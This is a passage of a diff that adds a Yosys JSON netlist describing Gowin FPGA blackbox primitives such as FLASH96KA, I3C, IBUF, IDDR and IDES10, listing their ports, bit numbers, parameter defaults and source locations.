95, 96, 97, 98, 99, 100, 101, 102 ] + } + }, + "cells": { + }, + "netnames": { + "ACLK": { + "hide_name": 0, + "bits": [ 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1516.7-1516.11" + } + }, + "CA": { + "hide_name": 0, + "bits": [ 8, 9, 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1513.16-1513.18" + } + }, + "DIN": { + "hide_name": 0, + "bits": [ 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1519.14-1519.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1520.15-1520.19" + } + }, + "MODE": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1514.13-1514.17" + } + }, + "OE": { + "hide_name": 0, + "bits": [ 30 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1516.24-1516.26" + } + }, + "PA": { + "hide_name": 0, + "bits": [ 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1513.19-1513.21" + } + }, + "PE": { + "hide_name": 0, + "bits": [ 29 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1516.21-1516.23" + } + }, + "PW": { + "hide_name": 0, + "bits": [ 27 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1516.12-1516.14" + } + }, + "RA": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1513.13-1513.15" + } + }, + "RBYTESEL": { + "hide_name": 0, + "bits": [ 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1518.13-1518.21" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 28 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1516.15-1516.20" + } + }, + "RMODE": { + "hide_name": 0, + "bits": [ 31, 32 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1517.13-1517.18" + } + }, + "SEQ": { + "hide_name": 0, + "bits": [ 24, 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1515.13-1515.16" + } + }, + "WBYTESEL": { + "hide_name": 0, + "bits": [ 37, 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1518.22-1518.30" + } + }, + "WMODE": { + "hide_name": 0, + "bits": [ 33, 34 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1517.19-1517.24" + } + } + } + }, + "FLASH96KA": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1921.1-1942.10" + }, + "parameter_default_values": { + "ERA_S1": "0001", + "ERA_S2": "0010", + "ERA_S3": "0011", + "ERA_S4": "0100", + "ERA_S5": "0101", + "IDLE": "0000", + "PRO_S1": "0110", + "PRO_S2": "0111", + "PRO_S3": "1000", + "PRO_S4": "1001", + "PRO_S5": "1010", + "RD_S1": "1011", + "RD_S2": "1100" + }, + "ports": { + "XADR": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7 ] + }, + "YADR": { + "direction": "input", + "bits": [ 8, 9, 10, 11, 12, 13 ] + }, + "XE": { + "direction": "input", + "bits": [ 14 ] + }, + "YE": { + "direction": "input", + "bits": [ 15 ] + }, + "SE": { + "direction": "input", + "bits": [ 16 ] + }, + "ERASE": { + "direction": "input", + "bits": [ 17 ] + }, + "PROG": { + "direction": "input", + "bits": [ 18 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 19 ] + }, + "DIN": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ] + }, + "SLEEP": { + "direction": "input", + "bits": [ 52 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84 ] + } + }, + "cells": { + }, + "netnames": { + "DIN": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1926.14-1926.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1928.19-1928.23" + } + }, + "ERASE": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1925.7-1925.12" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1925.18-1925.23" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1925.13-1925.17" + } + }, + "SE": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1924.13-1924.15" + } + }, + "SLEEP": { + "hide_name": 0, + "bits": [ 52 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1927.7-1927.12" + } + }, + "XADR": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1922.11-1922.15" + } + }, + "XE": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1924.7-1924.9" + } + }, + "YADR": { + "hide_name": 0, + "bits": [ 8, 9, 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1923.11-1923.15" + } + }, + "YE": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1924.10-1924.12" + } + } + } + }, + "GND": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:549.1-551.10" + }, + "ports": { + "G": { + "direction": "output", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "G": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:549.19-549.20" + } + } + } + }, + "GSR": { + "attributes": { + "keep": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:923.1-924.10" + }, + "ports": { + "GSRI": { + "direction": "input", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "GSRI": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:923.19-923.23" + } + } + } + }, + "I3C": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1750.1-1769.10" + }, + "parameter_default_values": { + "ADDRESS": "0000000" + }, + "ports": { + "LGYS": { + "direction": "input", + "bits": [ 2 ] + }, + "CMS": { + "direction": "input", + "bits": [ 3 ] + }, + "ACS": { + "direction": "input", + "bits": [ 4 ] + }, + "AAS": { + "direction": "input", + "bits": [ 5 ] + }, + "STOPS": { + "direction": "input", + "bits": [ 6 ] + }, + "STRTS": { + "direction": "input", + "bits": [ 7 ] + }, + "LGYO": { + "direction": "output", + "bits": [ 8 ] + }, + "CMO": { + "direction": "output", + "bits": [ 9 ] + }, + "ACO": { + "direction": "output", + "bits": [ 10 ] + }, + "AAO": { + "direction": "output", + "bits": [ 11 ] + }, + "SIO": { + "direction": "output", + "bits": [ 12 ] + }, + "STOPO": { + "direction": "output", + "bits": [ 13 ] + }, + "STRTO": { + "direction": "output", + "bits": [ 14 ] + }, + "LGYC": { + "direction": "input", + "bits": [ 15 ] + }, + "CMC": { + "direction": "input", + "bits": [ 16 ] + }, + "ACC": { + "direction": "input", + "bits": [ 17 ] + }, + "AAC": { + "direction": "input", + "bits": [ 18 ] + }, + "SIC": { + "direction": "input", + "bits": [ 19 ] + }, + "STOPC": { + "direction": "input", + "bits": [ 20 ] + }, + "STRTC": { + "direction": "input", + "bits": [ 21 ] + }, + "STRTHDS": { + "direction": "input", + "bits": [ 22 ] + }, + "SENDAHS": { + "direction": "input", + "bits": [ 23 ] + }, + "SENDALS": { + "direction": "input", + "bits": [ 24 ] + }, + "ACKHS": { + "direction": "input", + "bits": [ 25 ] + }, + "ACKLS": { + "direction": "input", + "bits": [ 26 ] + }, + "STOPSUS": { + "direction": "input", + "bits": [ 27 ] + }, + "STOPHDS": { + "direction": "input", + "bits": [ 28 ] + }, + "SENDDHS": { + "direction": "input", + "bits": [ 29 ] + }, + "SENDDLS": { + "direction": "input", + "bits": [ 30 ] + }, + "RECVDHS": { + "direction": "input", + "bits": [ 31 ] + }, + "RECVDLS": { + "direction": "input", + "bits": [ 32 ] + }, + "ADDRS": { + "direction": "input", + "bits": [ 33 ] + }, + "PARITYERROR": { + "direction": "output", + "bits": [ 34 ] + }, + "DI": { + "direction": "input", + "bits": [ 35, 36, 37, 38, 39, 40, 41, 42 ] + }, + "DOBUF": { + "direction": "output", + "bits": [ 43, 44, 45, 46, 47, 48, 49, 50 ] + }, + "DO": { + "direction": "output", + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58 ] + }, + "STATE": { + "direction": "output", + "bits": [ 59, 60, 61, 62, 63, 64, 65, 66 ] + }, + "SDAI": { + "direction": "input", + "bits": [ 67 ] + }, + "SCLI": { + "direction": "input", + "bits": [ 68 ] + }, + "SDAO": { + "direction": "output", + "bits": [ 69 ] + }, + "SCLO": { + "direction": "output", + "bits": [ 70 ] + }, + "SDAOEN": { + "direction": "output", + "bits": [ 71 ] + }, + "SCLOEN": { + "direction": "output", + "bits": [ 72 ] + }, + "SDAPULLO": { + "direction": "output", + "bits": [ 73 ] + }, + "SCLPULLO": { + "direction": "output", + "bits": [ 74 ] + }, + "SDAPULLOEN": { + "direction": "output", + "bits": [ 75 ] + }, + "SCLPULLOEN": { + "direction": "output", + "bits": [ 76 ] + }, + "CE": { + "direction": "input", + "bits": [ 77 ] + }, + "RESET": { + "direction": "input", + "bits": [ 78 ] + }, + "CLK": { + "direction": "input", + "bits": [ 79 ] + } + }, + "cells": { + }, + "netnames": { + "AAC": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.24-1754.27" + } + }, + "AAO": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.25-1753.28" + } + }, + "AAS": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.24-1752.27" + } + }, + "ACC": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.19-1754.22" + } + }, + "ACKHS": { + "hide_name": 0, + "bits": [ 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1755.34-1755.39" + } + }, + "ACKLS": { + "hide_name": 0, + "bits": [ 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1756.7-1756.12" + } + }, + "ACO": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.20-1753.23" + } + }, + "ACS": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.19-1752.22" + } + }, + "ADDRS": { + "hide_name": 0, + "bits": [ 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1757.34-1757.39" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1768.8-1768.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 79 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1768.19-1768.22" + } + }, + "CMC": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.14-1754.17" + } + }, + "CMO": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.15-1753.18" + } + }, + "CMS": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.14-1752.17" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 35, 36, 37, 38, 39, 40, 41, 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1759.14-1759.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1761.15-1761.17" + } + }, + "DOBUF": { + "hide_name": 0, + "bits": [ 43, 44, 45, 46, 47, 48, 49, 50 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1760.15-1760.20" + } + }, + "LGYC": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.8-1754.12" + } + }, + "LGYO": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.9-1753.13" + } + }, + "LGYS": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.8-1752.12" + } + }, + "PARITYERROR": { + "hide_name": 0, + "bits": [ 34 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1758.8-1758.19" + } + }, + "RECVDHS": { + "hide_name": 0, + "bits": [ 31 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1757.16-1757.23" + } + }, + "RECVDLS": { + "hide_name": 0, + "bits": [ 32 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1757.25-1757.32" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1768.12-1768.17" + } + }, + "SCLI": { + "hide_name": 0, + "bits": [ 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1763.13-1763.17" + } + }, + "SCLO": { + "hide_name": 0, + "bits": [ 70 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1764.14-1764.18" + } + }, + "SCLOEN": { + "hide_name": 0, + "bits": [ 72 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1765.16-1765.22" + } + }, + "SCLPULLO": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1766.18-1766.26" + } + }, + "SCLPULLOEN": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1767.20-1767.30" + } + }, + "SDAI": { + "hide_name": 0, + "bits": [ 67 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1763.7-1763.11" + } + }, + "SDAO": { + "hide_name": 0, + "bits": [ 69 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1764.8-1764.12" + } + }, + "SDAOEN": { + "hide_name": 0, + "bits": [ 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1765.8-1765.14" + } + }, + "SDAPULLO": { + "hide_name": 0, + "bits": [ 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1766.8-1766.16" + } + }, + "SDAPULLOEN": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1767.8-1767.18" + } + }, + "SENDAHS": { + "hide_name": 0, + "bits": [ 23 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1755.16-1755.23" + } + }, + "SENDALS": { + "hide_name": 0, + "bits": [ 24 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1755.25-1755.32" + } + }, + "SENDDHS": { + "hide_name": 0, + "bits": [ 29 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1756.32-1756.39" + } + }, + "SENDDLS": { + "hide_name": 0, + "bits": [ 30 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1757.7-1757.14" + } + }, + "SIC": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.29-1754.32" + } + }, + "SIO": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.30-1753.33" + } + }, + "STATE": { + "hide_name": 0, + "bits": [ 59, 60, 61, 62, 63, 64, 65, 66 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1762.15-1762.20" + } + }, + "STOPC": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.34-1754.39" + } + }, + "STOPHDS": { + "hide_name": 0, + "bits": [ 28 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1756.23-1756.30" + } + }, + "STOPO": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.35-1753.40" + } + }, + "STOPS": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.29-1752.34" + } + }, + "STOPSUS": { + "hide_name": 0, + "bits": [ 27 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1756.14-1756.21" + } + }, + "STRTC": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1754.41-1754.46" + } + }, + "STRTHDS": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1755.7-1755.14" + } + }, + "STRTO": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1753.42-1753.47" + } + }, + "STRTS": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1752.36-1752.41" + } + } + } + }, + "I3C_IOBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1468.1-1472.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "IO": { + "direction": "inout", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "MODESEL": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1471.8-1471.9" + } + }, + "IO": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1470.7-1470.9" + } + }, + "MODESEL": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1471.11-1471.18" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1469.8-1469.9" + } + } + } + }, + "IBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:553.1-560.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$141": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000000000000", + "T_FALL_MIN": "00000000000000000000000000000000", + "T_FALL_TYP": "00000000000000000000000000000000", + "T_RISE_MAX": "00000000000000000000000000000000", + "T_RISE_MIN": "00000000000000000000000000000000", + "T_RISE_TYP": "00000000000000000000000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:556.3-556.16" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + } + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:553.29-553.30" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:553.20-553.21" + } + } + } + }, + "IDDR": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:856.1-863.10" + }, + "parameter_default_values": { + "Q0_INIT": "0", + "Q1_INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "CLK": { + "direction": "input", + "bits": [ 3 ] + }, + "Q0": { + "direction": "output", + "bits": [ 4 ] + }, + "Q1": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:858.8-858.11" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:857.8-857.9" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:859.9-859.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:860.9-860.11" + } + } + } + }, + "IDDRC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:865.1-873.10" + }, + "parameter_default_values": { + "Q0_INIT": "0", + "Q1_INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "CLK": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "Q0": { + "direction": "output", + "bits": [ 5 ] + }, + "Q1": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:868.8-868.13" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:867.8-867.11" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:866.8-866.9" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:869.9-869.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:870.9-870.11" + } + } + } + }, + "IDES10": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:783.1-804.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "Q9": { + "direction": "output", + "bits": [ 2 ] + }, + "Q8": { + "direction": "output", + "bits": [ 3 ] + }, + "Q7": { + "direction": "output", + "bits": [ 4 ] + }, + "Q6": { + "direction": "output", + "bits": [ 5 ] + }, + "Q5": { + "direction": "output", + "bits": [ 6 ] + }, + "Q4": { + "direction": "output", + "bits": [ 7 ] + }, + "Q3": { + "direction": "output", + "bits": [ 8 ] + }, + "Q2": { + "direction": "output", + "bits": [ 9 ] + }, + "Q1": { + "direction": "output", + "bits": [ 10 ] + }, + "Q0": { + "direction": "output", + "bits": [ 11 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 12 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 13 ] + }, + "RESET": { + "direction": "input", + "bits": [ 14 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 15 ] + }, + "D": { + "direction": "input", + "bits": [ 16 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:789.8-789.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:785.8-785.9" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:786.8-786.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:787.8-787.12" + } + }, + 